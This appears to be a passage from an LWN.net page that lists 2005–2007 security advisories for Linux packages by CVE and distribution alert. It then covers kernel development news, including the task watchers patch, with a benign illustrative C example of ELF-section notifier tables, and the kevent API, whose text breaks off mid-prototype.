Description: slapd in OpenLDAP before 2.3.25 allows remote authenticated users with selfwrite Access Control List (ACL) privileges to modify arbitrary Distinguished Names (DN).
Alerts:
Red Hat RHSA-2007:0430-01 2007-06-11
Red Hat RHSA-2007:0310-02 2007-05-01
Trustix TSLSA-2006-0055 2006-10-06
rPath rPSA-2006-0176-1 2006-09-29
Mandriva MDKSA-2006:171 2006-09-28

Comments (none posted)

openoffice.org: several vulnerabilities

Package(s):openoffice.org CVE #(s):CVE-2006-2198 CVE-2006-2199 CVE-2006-3117
Created:June 30, 2006 Updated:January 4, 2007
Description: Several vulnerabilities have been discovered in OpenOffice.org, a free office suite.
  • It turned out to be possible to embed arbitrary BASIC macros in documents in a way that OpenOffice.org does not see them but executes them anyway without any user interaction. (CVE-2006-2198)
  • It is possible to evade the Java sandbox with specially crafted Java applets. (CVE-2006-2199)
  • Loading malformed XML documents can cause buffer overflows and cause a denial of service or execute arbitrary code. (CVE-2006-3117)
Alerts:
Fedora FEDORA-2007-005 2007-01-03
rPath rPSA-2006-0173-1 2006-09-26
Gentoo 200607-12 2006-07-28
Ubuntu USN-313-2 2006-07-19
Ubuntu USN-313-1 2006-07-11
Mandriva MDKSA-2006:118 2006-07-07
Debian DSA-1104-2 2006-07-06
Red Hat RHSA-2006:0573-01 2006-07-03
SuSE SUSE-SA:2006:040 2006-07-03
Fedora FEDORA-2006-770 2006-07-03
Fedora FEDORA-2006-764 2006-06-30
Debian DSA-1104-1 2006-06-30

Comments (none posted)

OpenSSH: denial of service

Package(s):openssh CVE #(s):CVE-2006-4925 CVE-2006-5052
Created:October 6, 2006 Updated:November 15, 2007
Description: packet.c in ssh in OpenSSH allows remote attackers to cause a denial of service (crash) by sending an invalid protocol sequence with USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL.

An unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."

Alerts:
Red Hat RHSA-2007:0703-02 2007-11-15
Red Hat RHSA-2007:0540-04 2007-11-07
Fedora FEDORA-2007-394 2007-04-03
Gentoo 200611-06 2006-11-13
SuSE SUSE-SA:2006:062 2006-10-20
rPath rPSA-2006-0185-1 2006-10-05

Comments (none posted)

openssh: remote denial of service

Package(s):openssh CVE #(s):CVE-2006-4924 CVE-2006-5051
Created:September 27, 2006 Updated:September 17, 2008
Description: OpenSSH 4.4 fixes some security issues, including a pre-authentication denial of service, an unsafe signal handler and, in portable OpenSSH, a GSSAPI authentication abort that could be used to determine the validity of usernames on some platforms.
Alerts:
Debian DSA-1638-1 2008-09-16
Debian DSA-1212-1 2006-11-15
Fedora FEDORA-2006-1011 2006-10-03
Debian DSA-1189-1 2006-10-04
Mandriva MDKSA-2006:179 2006-10-03
Ubuntu USN-355-1 2006-10-02
OpenPKG OpenPKG-SA-2006.022 2006-10-01
Slackware SSA:2006-272-02 2006-09-29
Red Hat RHSA-2006:0698-01 2006-09-28
Red Hat RHSA-2006:0697-01 2006-09-28
Gentoo 200609-17:02 2006-09-27
rPath rPSA-2006-0174-1 2006-09-27
Gentoo 200609-17 2006-09-27

Comments (none posted)

openssl: insufficient signature checking

Package(s):openssl CVE #(s):CVE-2006-4339
Created:September 5, 2006 Updated:November 15, 2006
Description: Philip Mackenzie, Marius Schilder, Jason Waddle and Ben Laurie of Google Security discovered that the OpenSSL library did not sufficiently check the padding of PKCS #1 v1.5 signatures if the exponent of the public key is 3 (which is widely used for CAs). This could be exploited to forge signatures without the need of the secret key.
Alerts:
Mandriva MDKSA-2006:207 2006-11-14
Slackware SSA:2006-310-01 2006-11-07
OpenPKG OpenPKG-SA-2006.029 2006-11-06
SuSE SUSE-SA:2006:061 2006-10-19
Slackware SSA:2006-257-02 2006-09-15
Gentoo 200609-05:02 2006-09-07
Debian DSA-1174-1 2006-09-11
Debian DSA-1173-1 2006-09-10
Red Hat RHSA-2006:0661-01 2006-09-06
Gentoo 200609-05 2006-09-07
Mandriva MDKSA-2006:161 2006-09-06
rPath rPSA-2006-0163-1 2006-09-05
OpenPKG OpenPKG-SA-2006.018 2006-09-06
Fedora FEDORA-2006-953 2006-09-05
Ubuntu USN-339-1 2006-09-05

Comments (none posted)

openssl: multiple vulnerabilities

Package(s):openssl CVE #(s):CVE-2006-2937 CVE-2006-2940 CVE-2006-3780 CVE-2006-4343 CVE-2006-3738
Created:September 28, 2006 Updated:December 12, 2006
Description: OpenSSL has a number of denial of service vulnerabilities including: two vulnerabilities involving invalid ASN.1 structures, a buffer overflow in the SSL_get_shared_ciphers() function and an SSLv2 client crash that can be caused by a malicious server.
Alerts:
Gentoo 200612-11 2006-12-11
Gentoo 200610-11 2006-10-24
Debian DSA-1195-1 2006-10-10
SuSE SUSE-SR:2006:024 2006-10-06
Ubuntu USN-353-2 2006-10-04
Mandriva MDKSA-2006:178 2006-10-02
Mandriva MDKSA-2006:177 2006-10-02
Mandriva MDKSA-2006:172-1 2006-10-02
Debian DSA-1185-2 2006-10-02
rPath rPSA-2006-0175-2 2006-09-28
Fedora FEDORA-2006-1004 2006-09-28
Trustix TSLSA-2006-0054 2006-09-29
Slackware SSA:2006-272-01 2006-09-29
rPath rPSA-2006-0175-1 2006-09-28
Red Hat RHSA-2006:0695-01 2006-09-28
Mandriva MDKSA-2006:172 2006-09-28
Debian DSA-1185-1 2006-09-28
Ubuntu USN-353-1 2006-09-28
SuSE SUSE-SA:2006:058 2006-09-28
OpenPKG OpenPKG-SA-2006.021 2006-09-28

Comments (none posted)

php: several vulnerabilities

Package(s):php CVE #(s):CVE-2006-4481 CVE-2006-4484 CVE-2006-4485
Created:September 8, 2006 Updated:June 13, 2008
Description: The file_exists and imap_reopen functions in PHP before 5.1.5 do not check for the safe_mode and open_basedir settings, which allows local users to bypass the settings (CVE-2006-4481).

A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array (CVE-2006-4484).

The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read (CVE-2006-4485).

Alerts:
SuSE SUSE-SR:2008:013 2008-06-13
Mandriva MDVSA-2008:077 2007-03-26
SuSE SUSE-SR:2008:005 2008-03-06
Red Hat RHSA-2008:0146-01 2008-02-28
Fedora FEDORA-2008-1643 2008-02-13
Foresight FLEA-2008-0007-1 2008-02-11
Fedora FEDORA-2008-1122 2008-02-05
Fedora FEDORA-2008-1131 2008-02-05
SuSE SUSE-SR:2008:003 2008-02-07
Mandriva MDVSA-2008:038 2007-02-07
rPath rPSA-2008-0046-1 2008-02-06
Gentoo 200802-01 2008-02-06
rPath rPSA-2006-0182-1 2006-10-05
SuSE SUSE-SA:2006:052 2006-09-21
Red Hat RHSA-2006:0669-01 2006-09-21
Mandriva MDKSA-2006:162 2006-09-07

Comments (1 posted)

phpbb2: missing input sanitizing

Package(s):phpbb2 CVE #(s):CVE-2006-1896
Created:May 22, 2006 Updated:February 11, 2008
Description: It was discovered that phpbb2, a web based bulletin board, insufficiently sanitizes values passed to the "Font Color 3" setting, which might lead to the execution of injected code by admin users.
Alerts:
Debian DSA-1066-1 2006-05-20

Comments (none posted)

phpbb2: multiple vulnerabilities

Package(s):phpbb2 CVE #(s):CVE-2005-3310 CVE-2005-3415 CVE-2005-3416 CVE-2005-3417 CVE-2005-3418 CVE-2005-3419 CVE-2005-3420 CVE-2005-3536 CVE-2005-3537
Created:December 22, 2005 Updated:February 11, 2008
Description: The phpbb2 web forum has a number of vulnerabilities including: a web script injection problem, a protection mechanism bypass, a security check bypass, a remote global variable bypass, cross site scripting vulnerabilities, an SQL injection vulnerability, a remote regular expression modification problem, missing input sanitizing, and a missing request validation problem.
Alerts:
Debian DSA-925-1 2005-12-22

Comments (none posted)

phpMyAdmin: multiple vulnerabilities

Package(s):phpmyadmin CVE #(s):CVE-2005-4079 CVE-2005-3665
Created:December 12, 2005 Updated:November 20, 2006
Description: Stefan Esser reported multiple vulnerabilities found in phpMyAdmin. The $GLOBALS variable allows modifying the global variable import_blacklist to open phpMyAdmin to local and remote file inclusion, depending on your PHP version (CVE-2005-4079, PMASA-2005-9). Furthermore, it is also possible to conduct an XSS attack via the $HTTP_HOST variable and a local and remote file inclusion because the contents of the variable are under total control of the attacker (CVE-2005-3665, PMASA-2005-8).
Alerts:
Debian DSA-1207-2 2006-11-19
Debian DSA-1207-1 2006-11-09
SuSE SUSE-SA:2006:004 2006-01-26
Gentoo 200512-03 2005-12-11

Comments (none posted)

postgresql: SQL injection

Package(s):postgresql CVE #(s):CVE-2006-2313 CVE-2006-2314
Created:May 24, 2006 Updated:June 6, 2007
Description: The PostgreSQL team has put out a set of "urgent updates" (in the form of the 7.3.15, 7.4.13, 8.0.8, and 8.1.4 releases) closing a newly-discovered set of SQL injection issues. Details about the problem can be found on the technical information page; in short: multi-byte encodings can be used to defeat normal string sanitizing techniques. The update fixes one problem related to invalid multi-byte characters, but punts on another by simply disallowing the old, unsafe technique of escaping single quotes with a backslash.
Alerts:
Fedora FEDORA-2007-0249 2007-06-06
Trustix TSLSA-2006-0059 2006-10-27
Gentoo 200607-04 2006-07-09
SuSE SUSE-SA:2006:030 2006-06-09
Ubuntu USN-288-3 2006-06-09
Ubuntu USN-288-2 2006-06-09
Mandriva MDKSA-2006:098 2006-06-07
Debian DSA-1087-1 2006-06-03
Ubuntu USN-288-1 2006-05-29
rPath rPSA-2006-0080-1 2006-05-24
Red Hat RHSA-2006:0526-02 2006-05-23
Fedora FEDORA-2006-578 2006-05-23
Fedora FEDORA-2006-579 2006-05-23

Comments (1 posted)

python: arbitrary code execution

Package(s):python CVE #(s):CVE-2006-4980
Created:October 6, 2006 Updated:November 7, 2006
Description: Benjamin C. Wiley Sittler discovered that Python's repr() function did not properly handle UTF-32/UCS-4 strings. If an application uses repr() on arbitrary untrusted data, this could be exploited to execute arbitrary code with the privileges of the python application.
Alerts:
Fedora FEDORA-2006-1049 2006-11-06
Gentoo 200610-07:02 2006-10-17
Gentoo 200610-07 2006-10-17
rPath rPSA-2006-0187-1 2006-10-10
Mandriva MDKSA-2006:181 2006-10-10
Red Hat RHSA-2006:0713-01 2006-10-09
Ubuntu USN-359-1 2006-10-06

Comments (1 posted)

quake: buffer overflow

Package(s):quake3-bin CVE #(s):CVE-2006-2236
Created:May 10, 2006 Updated:January 12, 2009
Description: Games based on the Quake 3 engine are vulnerable to a buffer overflow exploitable by a hostile game server.
Alerts:
Gentoo 200901-06 2009-01-11
Gentoo 200605-12 2006-05-10

Comments (none posted)

ruby: denial of service

Package(s):ruby CVE #(s):CVE-2006-5467
Created:October 30, 2006 Updated:December 13, 2006
Description: The CGI library in Ruby 1.8 allowed a remote attacker to cause a denial of service via an HTTP request with a multipart MIME body that contained an invalid boundary specifier, which would result in an infinite loop and CPU consumption.
Alerts:
Debian DSA-1235-1 2006-12-13
Debian DSA-1234-1 2006-12-13
Fedora FEDORA-2006-1441 2006-12-11
Fedora FEDORA-2006-1440 2006-12-11
Gentoo 200611-12 2006-11-20
Red Hat RHSA-2006:0729-01 2006-11-08
OpenPKG OpenPKG-SA-2006.030 2006-11-06
Ubuntu USN-371-1 2006-10-31
Fedora FEDORA-2006-1110 2006-10-30
Mandriva MDKSA-2006:192 2006-10-27

Comments (none posted)

screen: denial of service

Package(s):screen CVE #(s):CVE-2006-4573
Created:October 26, 2006 Updated:November 6, 2006
Description: The screen virtual terminal application has a denial of service vulnerability related to the handling of UTF-8 combining characters. If an attacker can trick a user into displaying maliciously created output, a denial of service can result. The attacker may also be able to exploit the vulnerability in order to run arbitrary software with the privileges of the user.
Alerts:
Slackware SSA:2006-307-02 2006-11-06
Gentoo 200611-01 2006-11-03
Ubuntu USN-370-1 2006-10-31
Debian DSA-1202-1 2006-10-31
Mandriva MDKSA-2006:191 2006-10-27
OpenPKG OpenPKG-SA-2006.026 2006-10-26
rPath rPSA-2006-0198-1 2006-10-26

Comments (none posted)

sendmail: denial of service

Package(s):sendmail CVE #(s):CVE-2006-1173
Created:June 15, 2006 Updated:November 1, 2006
Description: Sendmail has a vulnerability in the way it handles multi-part MIME messages. A remote attacker can create a specially crafted email message that can be used to crash the sendmail process, causing a denial of service.
Alerts:
Fedora-Legacy FLSA:195418 2006-10-29
Debian DSA-1155-2 2006-08-24
Debian DSA-1155-1 2006-08-24
rPath rPSA-2006-0134-1 2006-07-21
Fedora FEDORA-2006-837 2006-07-18
Fedora FEDORA-2006-836 2006-07-18
Gentoo 200606-19 2006-06-15
SuSE SUSE-SA:2006:032 2006-06-14
Slackware SSA:2006-166-01 2006-06-15
Red Hat RHSA-2006:0515-01 2006-06-14
Mandriva MDKSA-2006:104 2006-06-14

Comments (none posted)

shadow-utils: mailbox creation vulnerability

Package(s):shadow-utils CVE #(s):CVE-2006-1174
Created:May 25, 2006 Updated:June 12, 2007
Description: The useradd tool from the shadow-utils package has a potential security problem. When a new user's mailbox is created, the permissions are set to random garbage from the stack, potentially allowing the file to be read or written during the time before fchmod() is called.
Alerts:
Red Hat RHSA-2007:0431-01 2007-06-11
rPath rPSA-2007-0096-1 2007-05-11
Red Hat RHSA-2007:0276-02 2007-05-01
Gentoo 200606-02 2006-06-07
Mandriva MDKSA-2006:090 2006-05-24

Comments (none posted)

texinfo: temporary file vulnerability

Package(s):texinfo CVE #(s):CAN-2005-3011
Created:October 5, 2005 Updated:November 9, 2006
Description: Texinfo prior to version 4.8-r1 suffers from a temporary file vulnerability.
Alerts:
Ubuntu USN-194-2 2006-01-09
Fedora FEDORA-2005-991 2005-10-14
Fedora FEDORA-2005-990 2005-10-14
Mandriva MDKSA-2005:175 2005-10-06
Ubuntu USN-194-1 2005-10-06
Gentoo 200510-04 2005-10-05

Comments (none posted)

tin: buffer overflow

Package(s):tin CVE #(s):CVE-2006-0804
Created:February 19, 2006 Updated:November 24, 2006
Description: An allocation off-by-one bug exists in the TIN news reader version 1.8.0 and earlier which can lead to a buffer overflow.
Alerts:
Gentoo 200611-18 2006-11-24
OpenPKG OpenPKG-SA-2006.005 2006-02-19

Comments (none posted)

unzip: long file name buffer overflow

Package(s):unzip CVE #(s):CVE-2005-4667
Created:February 6, 2006 Updated:May 2, 2007
Description: A buffer overflow in UnZip 5.50 and earlier allows local users to execute arbitrary code via a long filename command line argument. NOTE: since the overflow occurs in a non-setuid program, there are not many scenarios under which it poses a vulnerability, unless unzip is passed long arguments when it is invoked from other programs.
Alerts:
Red Hat RHSA-2007:0203-02 2007-05-01
Fedora-Legacy FLSA:180159 2006-04-04
Debian DSA-1012-1 2006-03-21
Mandriva MDKSA-2006:050 2006-02-27
Ubuntu USN-248-2 2006-02-15
Ubuntu USN-248-1 2006-02-13
Fedora FEDORA-2006-098 2006-02-06

Comments (1 posted)

w3c-libwww: possible stack overflow

Package(s):w3c-libwww CVE #(s):CVE-2005-3183
Created:October 14, 2005 Updated:May 2, 2007
Description: Extensive testing of libwww's handling of multipart/byteranges content from HTTP/1.1 servers revealed multiple logical flaws and bugs in Library/src/HTBound.c.
Alerts:
Red Hat RHSA-2007:0208-02 2007-05-01
Ubuntu USN-220-1 2005-12-01
Mandriva MDKSA-2005:210 2005-11-09
Fedora FEDORA-2005-953 2005-10-07
Fedora FEDORA-2005-952 2005-10-07

Comments (1 posted)

wireshark: several vulnerabilities

Package(s):wireshark CVE #(s):CVE-2006-4330 CVE-2006-4331 CVE-2006-4332 CVE-2006-4333
Created:August 25, 2006 Updated:November 2, 2006
Description: There are multiple problems in Wireshark, versions 0.7.9 to 0.99.2.
Alerts:
Red Hat RHSA-2006:0658-01 2006-09-12
Debian DSA-1171-1 2006-09-07
Gentoo 200608-26 2006-08-29
Fedora FEDORA-2006-936 2006-08-25
Mandriva MDKSA-2006:152 2006-08-25
rPath rPSA-2006-0158-1 2006-08-25

Comments (none posted)

WordPress: multiple vulnerabilities

Package(s):wordpress CVE #(s):CVE-2006-5705
Created:October 30, 2006 Updated:November 17, 2006
Description: This vendor announcement identifies several vulnerabilities in WordPress versions prior to 2.0.5.
Alerts:
Gentoo 200611-10 2006-11-17
OpenPKG OpenPKG-SA-2006.027 2006-10-30

Comments (2 posted)

xine-lib: code execution

Package(s):xine-lib CVE #(s):CVE-2006-4799
Created:October 4, 2006 Updated:November 21, 2006
Description: The xine-lib package does not properly validate AVI headers, enabling an attacker to run arbitrary code via a specially crafted AVI file.
Alerts:
Debian DSA-1215-1 2006-11-20
Ubuntu USN-358-1 2006-10-04

Comments (none posted)

xine-lib: buffer overflow

Package(s):xine-lib CVE #(s):CVE-2006-1664
Created:April 27, 2006 Updated:February 27, 2008
Description: xine-lib does an improper input data boundary check on MPEG streams. A specially crafted MPEG file can be created that can cause arbitrary code execution when the file is accessed.
Alerts:
Gentoo 200802-12 2008-02-26
Gentoo 200604-16 2006-04-26

Comments (none posted)

xine-ui: format string vulnerabilities

Package(s):xine-ui CVE #(s):CVE-2006-2230
Created:June 9, 2006 Updated:January 24, 2007
Description: Several format string vulnerabilities have been discovered in xine-ui, the user interface of the xine video player, which may cause a denial of service.
Alerts:
Gentoo 200701-18 2007-01-23
Debian DSA-1093-1 2006-06-08

Comments (none posted)

xinit: race condition

Package(s):xinit CVE #(s):CVE-2006-5214
Created:October 17, 2006 Updated:August 9, 2007
Description: A race condition allows local users to see error messages generated during another user's X session. This could allow potentially sensitive information to be leaked.
Alerts:
Fedora FEDORA-2007-659 2007-08-08
Fedora FEDORA-2007-1409 2007-08-02
Ubuntu USN-364-1 2006-10-16

Comments (1 posted)

X.org: local privilege escalations

Package(s):xorg-x11 CVE #(s):CVE-2006-4447
Created:August 28, 2006 Updated:April 30, 2007
Description: Several X.org libraries and X.org itself contain system calls to set*uid() functions, without checking their result. Local users could deliberately exceed their assigned resource limits and elevate their privileges after an unsuccessful set*uid() system call. This requires resource limits to be enabled on the machine.
Alerts:
Gentoo 200704-22 2007-04-27
Mandriva MDKSA-2006:160 2006-08-31
Gentoo 200608-25 2006-08-28

Comments (none posted)

X.Org: buffer overflow

Package(s):xorg-x11-server xorg-x11 CVE #(s):CVE-2006-1526
Created:May 3, 2006 Updated:January 10, 2007
Description: There is a buffer overflow in the Xrender extension of the X.Org server; any process which is able to connect to the server may be able to exploit this overflow to run arbitrary code. Since the X server runs as root on most systems, this vulnerability could be exploited to gain root access. See the X.Org advisory for more information.
Alerts:
Fedora-Legacy FLSA:190777 2006-06-06
Trustix TSLSA-2006-0024 2006-05-05
Mandriva MDKSA-2006:081-1 2006-05-04
Ubuntu USN-280-1 2006-05-04
Slackware SSA:2006-123-01 2006-05-04
Red Hat RHSA-2006:0451-01 2006-05-04
SuSE SUSE-SA:2006:023 2006-05-03
Mandriva MDKSA-2006:081 2006-05-02
Gentoo 200605-02 2006-05-02

Comments (none posted)

xorg-x11: privilege escalation

Package(s):xorg-x11 xfree86 CVE #(s):CVE-2006-3739 CVE-2006-3740
Created:September 12, 2006 Updated:December 14, 2006
Description: iDefense reported two integer overflow flaws in the way the X.org server processed CID font files. A malicious authorized client could exploit this issue to cause a denial of service (crash) or potentially execute arbitrary code with root privileges on the X.org server.
Alerts:
Mandriva MDKSA-2006:164-2 2006-12-14
Mandriva MDKSA-2006:164-1 2006-11-17
Debian DSA-1193-1 2006-10-09
SuSE SUSE-SR:2006:023 2006-09-27
Slackware SSA:2006-259-01 2006-09-18
Mandriva MDKSA-2006:164 2006-09-14
Gentoo 200609-07 2006-09-13
Ubuntu USN-344-1 2006-09-12
Red Hat RHSA-2006:0666-01 2006-09-12
Red Hat RHSA-2006:0665-01 2006-09-12
rPath rPSA-2006-0167-1 2006-09-12

Comments (none posted)

xpdf: buffer overflow

Package(s):xpdf CVE #(s):CAN-2005-0064
Created:January 19, 2005 Updated:March 15, 2007
Description: iDEFENSE has found yet another xpdf buffer overflow; see this advisory for details.
Alerts:
Fedora FEDORA-2007-1219 2007-03-14
Gentoo 200506-06 2005-06-09
Red Hat RHSA-2005:026-01 2005-03-16
Red Hat RHSA-2005:066-01 2005-02-15
Red Hat RHSA-2005:057-01 2005-02-15
Red Hat RHSA-2005:053-01 2005-02-15
Red Hat RHSA-2005:034-01 2005-02-15
Fedora-Legacy FLSA:2353 2005-02-10
Fedora-Legacy FLSA:2352 2005-02-10
Gentoo 200502-10 2005-02-09
Red Hat RHSA-2005:049-01 2005-02-01
SuSE SUSE-SR:2005:002 2005-01-26
Red Hat RHSA-2005:059-01 2005-01-26
Mandrake MDKSA-2005:020 2005-01-25
Mandrake MDKSA-2005:019 2005-01-25
Mandrake MDKSA-2005:016 2005-01-25
Mandrake MDKSA-2005:021 2005-01-25
Mandrake MDKSA-2005:018 2005-01-25
Mandrake MDKSA-2005:017 2005-01-25
Fedora FEDORA-2005-061 2005-01-25
Fedora FEDORA-2005-062 2005-01-25
Fedora FEDORA-2005-059 2005-01-25
Fedora FEDORA-2005-060 2005-01-25
Conectiva CLA-2005:921 2005-01-25
Fedora FEDORA-2004-049 2005-01-24
Fedora FEDORA-2004-048 2005-01-24
Gentoo 200501-32 2005-01-23
Gentoo 200501-31 2005-01-23
Gentoo 200501-30 2005-01-22
Gentoo 200501-28 2005-01-21
Fedora FEDORA-2005-052 2005-01-20
Fedora FEDORA-2005-051 2005-01-20
Ubuntu USN-64-1 2005-01-19
Debian DSA-645-1 2005-01-19
Debian DSA-648-1 2005-01-19

Comments (1 posted)

xpdf: integer overflows

Package(s):xpdf, poppler, cupsys, tetex-bin CVE #(s):CVE-2005-3624 CVE-2005-3625 CVE-2005-3626 CVE-2005-3627
Created:January 5, 2006 Updated:November 30, 2006
Description: xpdf has a number of integer overflows. A remote attacker can trick a user into opening a maliciously crafted pdf file, allowing the attacker to execute code with the privileges of the local user. This also affects the Poppler library, cupsys and tetex-bin.
Alerts:
Fedora FEDORA-2006-1220 2006-11-30
Debian DSA-932-1 2006-01-09
Debian DSA-931-1 2006-01-09
Ubuntu USN-236-2 2006-01-09
Mandriva MDKSA-2006:008 2006-01-06
Mandriva MDKSA-2006:006 2006-01-05
Mandriva MDKSA-2006:005 2006-01-05
Mandriva MDKSA-2006:004 2006-01-05
Mandriva MDKSA-2006:003 2006-01-05
Ubuntu USN-236-1 2006-01-05

Comments (none posted)

xsupplicant: stack overflow

Package(s):xsupplicant CVE #(s):
Created:October 30, 2006 Updated:November 1, 2006
Description: Yannick Van Osselaer discovered a stack overflow in Xsupplicant, which could potentially be exploited by a remote, authenticated user to gain root privileges.
Alerts:
Mandriva MDKSA-2006:189 2006-10-27

Comments (none posted)

Page editor: Jonathan Corbet

Kernel development

Brief items

Kernel release status

The current 2.6 prepatch is 2.6.19-rc5, released by Linus on November 7. It contains another pile of fixes, many of them in architecture-specific code; the long-format changelog has the details. Linus says "there may be a -rc6, but maybe we don't even need one."

Adrian Bunk calls those "famous last words" in his 2.6.19-rc5 known regressions list.

The current -mm tree is 2.6.19-rc5-mm1. Recent changes to -mm include the latest kevent code (see below), the kernel virtual machine patch set, and some big updates to the high-resolution timer and dynamic tick code - which still has some problems.

The current stable 2.6 release is 2.6.18.2, released on November 3. Once again, quite a long list of patches has been merged into this release.

On the 2.6.16 front, 2.6.16.30 was released on November 3, followed by 2.6.16.31 on November 7. Between these two releases quite a few bugs have been fixed, including several which are security-related.

For 2.4 users, 2.4.34-pre5 came out on November 4. The first 2.4.34 release candidate is expected before too long.

Comments (none posted)

Kernel development news

OSDL to fund a kernel tech writer

It took a long time to come about, but it has happened: OSDL has pulled together the money to fund a technical writer to work on kernel documentation for a year. The job posting is available on the net for anybody who might be interested in applying.

Full Story (comments: 25)

Task watchers

One of the more complicated core kernel functions is copy_process(), in kernel/fork.c. This routine is the heart of the fork() and clone() system calls; it must create a coherent copy of a running process, bearing in mind the various clone flags which are present. There are sixteen different goto labels for error exits. This is clearly a place where a lot of things can go wrong.

It is also an operation of interest to many other kernel subsystems. A look at copy_process() reveals hooks for task delay accounting, auditing, the process fork connector, SYSV semaphore undo information management, NUMA memory policy enforcement, cpuset maintenance, keyring management, and more. Many of these subsystems want to know about other events in the process lifecycle as well, with the result that hooks are placed all over the process code. It might just be nice to have a cleaner solution to the problem of learning about process-related events.

That cleaner solution would appear to be present in the form of Matt Helsley's task watchers patch set, currently in its second major iteration. This patch takes an interesting approach to providing what is essentially just another notifier interface in order to minimize overhead in a performance-critical part of the kernel.

In this patch, a "task watcher" is a function which is notified whenever an interesting process event takes place. Watchers have this prototype:

    int my_watcher(unsigned long info, struct task_struct *tsk);

When the watcher function is called, info will have additional information for the specific event, and tsk points to the process generating the event. Arranging for a task watcher to be called is a simple matter of adding a declaration like the following:

    task_watcher_func(event, function);

Where event is the event of interest, and function is the task watcher function to be called in response to that event. The possible events are:

  • init: a process is first created; info is the set of flags passed to clone().

  • clone: a process forks; info is the set of clone() flags. Note that this watcher appears to be called with the child process; it differs from init in that it is called toward the end of copy_process(), when creation of the new process is complete.

  • exec: a process executes a new program; info is zero.

  • uid: a process changes its real or effective UID; info is zero.

  • gid: a process changes its real or effective GID; info is zero.

  • exit: a process dies; info is the exit code.

  • free: a process's task structure is being freed; info is the exit code.

The task_watcher_func() macro creates a pointer to the watcher function in a special ELF section. There is a separate section for each watched-for event; when such an event is signaled, the watcher code simply iterates through each function found in the relevant executable section. There are a couple of implications resulting from this mechanism: task watchers exist for the life of the system (they cannot be registered and unregistered), and they cannot be located in loadable modules (though this restriction will eventually go away).

One might well wonder why things were done this way, rather than using a simple notifier list. Your editor wondered, and asked Mr. Helsley about it. The problem is that process creation is a performance-critical part of the kernel, and any change which increases process fork time tends to get a lot of scrutiny. Fork times are measured by a number of benchmarks; quick process creation is also important in fork-heavy loads. Since kernel compilation can require a lot of forks, there is an especially strong incentive to keep it fast.

If a notifier list is used with watchers, some sort of locking is required to keep that list from being corrupted when watchers come and go. The separate ELF sections, instead, are read-only structures created at kernel build time. So they impose less overhead on the process lifecycle and, thus, are less likely to bother kernel developers who, perhaps, are not really interested in the watcher functionality.
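The section-table trick is easy to model outside the kernel. The following is an added example, not code from the article or from Mr. Helsley's patch: it uses GCC's section attribute and the __start_<section>/__stop_<section> symbols that GNU ld (and lld) synthesise for any section whose name is a valid C identifier. The struct task_struct, the event names and the audit bookkeeping are stand-ins chosen for the illustration; the point it demonstrates is that registration happens at link time, so notification is a loop over a fixed table with no list and no lock.

```c
/*
 * User-space model of task watchers: one ELF section per event, holding
 * function pointers placed there at build time. Added example; not the
 * kernel patch's code. Requires GCC/clang and GNU ld or lld on Linux.
 */
#include <stdio.h>
#include <string.h>

struct task_struct {            /* stand-in for the kernel structure */
    int  pid;
    char comm[16];
};

typedef int (*task_watcher_t)(unsigned long info, struct task_struct *tsk);

/* Register fn for event at link time: no list insertion, hence no lock. */
#define task_watcher_func(event, fn)                                      \
    static task_watcher_t tw_entry_##event##_##fn                         \
        __attribute__((section("tw_" #event), used)) = fn

/*
 * The linker provides __start_tw_<event> and __stop_tw_<event>, so the
 * notifier is a walk over a contiguous table. Returns the number of
 * watchers called; the watchers' own return values are not interpreted
 * here (the page does not describe what the patch does with them).
 */
#define DEFINE_TASK_EVENT(event)                                          \
    extern task_watcher_t __start_tw_##event[], __stop_tw_##event[];      \
    int notify_task_##event(unsigned long info, struct task_struct *tsk)  \
    {                                                                     \
        int called = 0;                                                   \
        for (task_watcher_t *w = __start_tw_##event;                      \
             w < __stop_tw_##event; w++, called++)                        \
            (*w)(info, tsk);                                              \
        return called;                                                    \
    }

/* A small audit trail so the effect of each notification is observable. */
#define TRAIL_MAX 8
char audit_trail[TRAIL_MAX][64];
int  audit_entries;
int  exec_count;

static int audit_exec(unsigned long info, struct task_struct *tsk)
{
    (void)info;                       /* exec passes info == 0 */
    if (audit_entries < TRAIL_MAX)
        snprintf(audit_trail[audit_entries++], sizeof audit_trail[0],
                 "exec pid=%d comm=%s", tsk->pid, tsk->comm);
    return 0;
}

static int count_exec(unsigned long info, struct task_struct *tsk)
{
    (void)info; (void)tsk;
    exec_count++;
    return 0;
}

static int audit_exit(unsigned long info, struct task_struct *tsk)
{
    if (audit_entries < TRAIL_MAX)     /* exit passes the exit code in info */
        snprintf(audit_trail[audit_entries++], sizeof audit_trail[0],
                 "exit pid=%d code=%lu", tsk->pid, info);
    return 0;
}

/* Two watchers for exec, one for exit: each line is one table entry. */
task_watcher_func(exec, audit_exec);
task_watcher_func(exec, count_exec);
task_watcher_func(exit, audit_exit);

DEFINE_TASK_EVENT(exec)
DEFINE_TASK_EVENT(exit)

/* Drive one exec followed by one exit; returns the total watchers called. */
int run_demo(void)
{
    struct task_struct t = { 4242, "sh" };   /* constructed sample task */
    audit_entries = 0;
    exec_count = 0;
    return notify_task_exec(0, &t) + notify_task_exit(3, &t);
}

int main(void)
{
    int n = run_demo();
    printf("%d watchers ran, %d exec(s) counted\n", n, exec_count);
    for (int i = 0; i < audit_entries; i++)
        puts(audit_trail[i]);
    return 0;
}
```

The model also shows the two limitations the article notes: a watcher that is not in the table at link time cannot be added later, and nothing can be removed, so there is no module path without further work.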

Comments (none posted)

This week's version of the kevent interface

The proposed kevent interface was last covered here in August. This new API, which seeks to provide a single interface for applications to receive events of interest, has been under development for the better part of a year now. It continues to evolve, so, in celebration of the version 23 kevent patch, another look is called for.

Parts of the interface remain relatively stable. So, the main multiplexer system call remains:

    int kevent_ctl(int fd, unsigned int cmd, unsigned int num,
                   struct ukevent *arg);

The functions performed by this call are reduced in number, however. It is no longer used to create the kevent file descriptor in the first place; instead, an open of /dev/kevent is called for. But kevent_ctl() is still the place to add events of interest, and to remove and modify them.

The synchronous interface for waiting for events is also pretty much as it has been for a little while:

    int kevent_get_events(int fd, unsigned int min_nr, unsigned int max_nr,
